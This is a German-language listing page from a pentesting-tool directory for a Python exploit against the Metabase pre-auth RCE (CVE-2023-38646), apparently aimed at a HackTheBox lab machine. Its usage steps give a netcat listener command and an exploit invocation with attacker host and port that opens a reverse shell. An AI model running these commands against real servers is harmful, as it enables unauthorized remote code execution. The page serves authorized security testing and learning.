Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
CVE-2023-38646 — Python-Exploit für Metabase Pre-Auth-RCE (CVE-2023-38646), der eine Reverse-Shell für autorisierte Sicherheitstests einrichtet. | Kitploit
Tools/GitHubGitHub/asepsaepdin/cve-2023-38646
ExploitationWebanwendungs-ExploitationPenetrationstestsLernen & BildungRemote-Access-Tool
GitHubasepsaepdin/cve-2023-38646

CVE-2023-38646

Python-Exploit für Metabase Pre-Auth-RCE (CVE-2023-38646), der eine Reverse-Shell für autorisierte Sicherheitstests einrichtet.

Repository anzeigen
1vor 2 JahrenNoch nicht geprüft

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen

CVE-2023-38646 - Metabase Pre-Auth RCE


⚠️ Nur für Bildungs- und autorisierte Sicherheitsforschungszwecke

Ursprüngliche Exploit-Autoren

Sehr dankbar dem ursprünglichen PoC-Autor securezeron

Schritt-für-Schritt-Anleitung

  1. Richten Sie den Listener auf Ihrem Angreifer-Rechner ein:

    root@kitploit:~
    nc -nlvp 4444
    
  2. Führen Sie dann diesen Befehl aus:

    root@kitploit:~
    python3 CVE-2023-38646-Reverse-Shell.py -h
    python3 CVE-2023-38646-Reverse-Shell.py --rhost http://data.analytical.htb/ --lhost 10.10.16.8 --lport 4444
    

    image

Quellen

  • https://nvd.nist.gov/vuln/detail/CVE-2023-38646
  • https://medium.com/@starlox.riju123/hackthebox-analytics-metabase-rce-bd3421cba76d
  • https://www.youtube.com/watch?v=br7JZzcTDG0
Tool herunterladen